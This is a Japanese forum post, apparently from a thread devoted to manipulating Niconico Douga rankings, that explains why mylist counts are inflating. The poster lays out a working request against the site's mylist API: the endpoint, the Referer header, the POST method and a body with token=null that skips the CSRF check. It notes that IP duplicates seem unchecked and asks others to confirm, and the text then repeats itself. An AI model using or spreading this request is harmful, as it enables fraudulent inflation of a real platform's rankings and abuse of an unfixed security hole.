ニコニコ動画工作支持スレ 23
大体、時速4000の謎が解けてきた。
結論から言うと、プレイヤーから「とりあえずマイリスト」する機能の穴で、
CSRF対策用のトークンを見ていないみたい。
具体的に言うと、http://flapi.nicovideo.jp/api/deflist/add
にポストする際のPOSTで「token=null」で渡しても、マイリス登録
できる。
この感じだと、IP重複も見てないっぽい。
今は忙しいので確認が取れない。誰か確認汁。
ポイント
url:http://flapi.nicovideo.jp/api/deflist/add
Referer:http://www.nicovideo.jp/swf/new/nicoplayer.swf?****
メソッド:POST
POSTボディ
description=&item%5Fid=スレッドID&token=null&item%5Ftype=0
多分、実装が間に合わないで、形だけ作った気がする。
以上
結論から言うと、プレイヤーから「とりあえずマイリスト」する機能の穴で、
CSRF対策用のトークンを見ていないみたい。
具体的に言うと、http://flapi.nicovideo.jp/api/deflist/add
にポストする際のPOSTで「token=null」で渡しても、マイリス登録
できる。
この感じだと、IP重複も見てないっぽい。
今は忙しいので確認が取れない。誰か確認汁。
ポイント
url:http://flapi.nicovideo.jp/api/deflist/add
Referer:http://www.nicovideo.jp/swf/new/nicoplayer.swf?****
メソッド:POST
POSTボディ
description=&item%5Fid=スレッドID&token=null&item%5Ftype=0
多分、実装が間に合わないで、形だけ作った気がする。
以上
|
|
|